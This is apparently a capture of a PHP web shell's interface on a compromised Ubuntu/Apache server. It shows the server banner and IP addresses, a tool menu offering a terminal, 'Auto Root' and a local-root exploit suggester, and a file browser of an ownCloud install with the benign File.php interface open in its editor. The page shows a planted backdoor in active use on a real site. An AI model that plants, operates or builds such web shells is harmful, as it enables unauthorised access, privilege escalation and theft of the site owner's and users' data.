Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
owncloud-prm /
lib /
public /
Files /
Delete
Unzip
Name
Size
Permission
Date
Action
Cache
[ DIR ]
drwxr-xr-x
2018-04-19 18:15
Config
[ DIR ]
drwxr-xr-x
2018-04-19 18:15
External
[ DIR ]
drwxr-xr-x
2018-04-19 18:15
Mount
[ DIR ]
drwxr-xr-x
2018-04-19 18:15
ObjectStore
[ DIR ]
drwxr-xr-x
2018-04-19 18:15
Storage
[ DIR ]
drwxr-xr-x
2018-04-19 18:15
AlreadyExistsException.php
1.16
KB
-rw-r--r--
2018-04-19 18:15
EntityTooLargeException.php
1.15
KB
-rw-r--r--
2018-04-19 18:15
File.php
2.39
KB
-rw-r--r--
2018-04-19 18:15
FileContentNotAllowedException.php
1.05
KB
-rw-r--r--
2018-04-19 18:15
FileInfo.php
5.06
KB
-rw-r--r--
2018-04-19 18:15
FileNameTooLongException.php
1.19
KB
-rw-r--r--
2018-04-19 18:15
Folder.php
4.11
KB
-rw-r--r--
2018-04-19 18:15
ForbiddenException.php
1.46
KB
-rw-r--r--
2018-04-19 18:15
IHomeStorage.php
1.13
KB
-rw-r--r--
2018-04-19 18:15
IMimeTypeDetector.php
1.94
KB
-rw-r--r--
2018-04-19 18:15
IMimeTypeLoader.php
1.48
KB
-rw-r--r--
2018-04-19 18:15
IRootFolder.php
1.13
KB
-rw-r--r--
2018-04-19 18:15
InvalidCharacterInPathException.php
1.18
KB
-rw-r--r--
2018-04-19 18:15
InvalidContentException.php
1.15
KB
-rw-r--r--
2018-04-19 18:15
InvalidPathException.php
1.14
KB
-rw-r--r--
2018-04-19 18:15
LockNotAcquiredException.php
1.88
KB
-rw-r--r--
2018-04-19 18:15
NoReadAccessException.php
1.13
KB
-rw-r--r--
2018-04-19 18:15
Node.php
7.31
KB
-rw-r--r--
2018-04-19 18:15
NotEnoughSpaceException.php
1.15
KB
-rw-r--r--
2018-04-19 18:15
NotFoundException.php
1.14
KB
-rw-r--r--
2018-04-19 18:15
NotPermittedException.php
1.15
KB
-rw-r--r--
2018-04-19 18:15
ReservedWordException.php
1.16
KB
-rw-r--r--
2018-04-19 18:15
Storage.php
10.87
KB
-rw-r--r--
2018-04-19 18:15
StorageAuthException.php
1.24
KB
-rw-r--r--
2018-04-19 18:15
StorageBadConfigException.php
1.28
KB
-rw-r--r--
2018-04-19 18:15
StorageConnectionException.php
1.26
KB
-rw-r--r--
2018-04-19 18:15
StorageInvalidException.php
1.16
KB
-rw-r--r--
2018-04-19 18:15
StorageNotAvailableException.php
2.56
KB
-rw-r--r--
2018-04-19 18:15
StorageTimeoutException.php
1.25
KB
-rw-r--r--
2018-04-19 18:15
UnseekableException.php
1.09
KB
-rw-r--r--
2018-04-19 18:15
Save
Rename
<?php /** * @author Jörn Friedrich Dreyer <jfd@butonic.de> * @author Morris Jobke <hey@morrisjobke.de> * @author Robin Appelman <icewind@owncloud.com> * @author Roeland Jago Douma <rullzer@owncloud.com> * * @copyright Copyright (c) 2018, ownCloud GmbH * @license AGPL-3.0 * * This code is free software: you can redistribute it and/or modify * it under the terms of the GNU Affero General Public License, version 3, * as published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU Affero General Public License for more details. * * You should have received a copy of the GNU Affero General Public License, version 3, * along with this program. If not, see <http://www.gnu.org/licenses/> * */ /** * Public interface of ownCloud for apps to use. * Files/File interface */ // use OCP namespace for all classes that are considered public. // This means that they should be used by apps instead of the internal ownCloud classes namespace OCP\Files; /** * Interface File * * @package OCP\Files * @since 6.0.0 */ interface File extends Node { /** * Get the content of the file as string * * @return string * @throws \OCP\Files\NotPermittedException * @since 6.0.0 */ public function getContent(); /** * Write to the file from string data * * @param string $data * @throws \OCP\Files\NotPermittedException * @return void * @since 6.0.0 */ public function putContent($data); /** * Get the mimetype of the file * * @return string * @since 6.0.0 */ public function getMimeType(); /** * Open the file as stream, resulting resource can be operated as stream like the result from php's own fopen * * @param string $mode * @return resource * @throws \OCP\Files\NotPermittedException * @since 6.0.0 */ public function fopen($mode); /** * Compute the hash of the file * Type of hash is set with $type and can be anything supported by php's hash_file * * @param string $type * @param bool $raw * @return string * @since 6.0.0 */ public function hash($type, $raw = false); /** * Get the stored checksum for this file * * @return string * @since 9.0.0 * @throws InvalidPathException * @throws NotFoundException */ public function getChecksum(); }